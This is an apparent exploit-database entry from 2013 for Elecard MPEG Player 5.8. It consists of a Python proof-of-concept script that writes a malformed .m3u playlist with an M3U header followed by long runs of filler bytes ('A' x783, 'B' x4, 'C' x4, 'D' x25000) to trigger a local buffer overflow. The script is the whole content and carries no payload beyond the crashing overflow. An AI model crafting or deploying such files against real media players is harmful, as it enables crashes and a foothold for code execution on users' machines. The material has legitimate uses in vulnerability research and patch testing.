Elecard MPEG Player 5.8 Buffer Overflow



EKU-ID: 3186 CVE: OSVDB-ID:
Author: metacom Published: 2013-05-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python 
# Exploit Title:Elecard MPEG Player 5.8 Local PoC 
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German  

head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"

buffer= "\x41" * 783
buffer+="\x42" * 4 
buffer+="\x43" * 4
buffer+="\x44" * 25000

textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()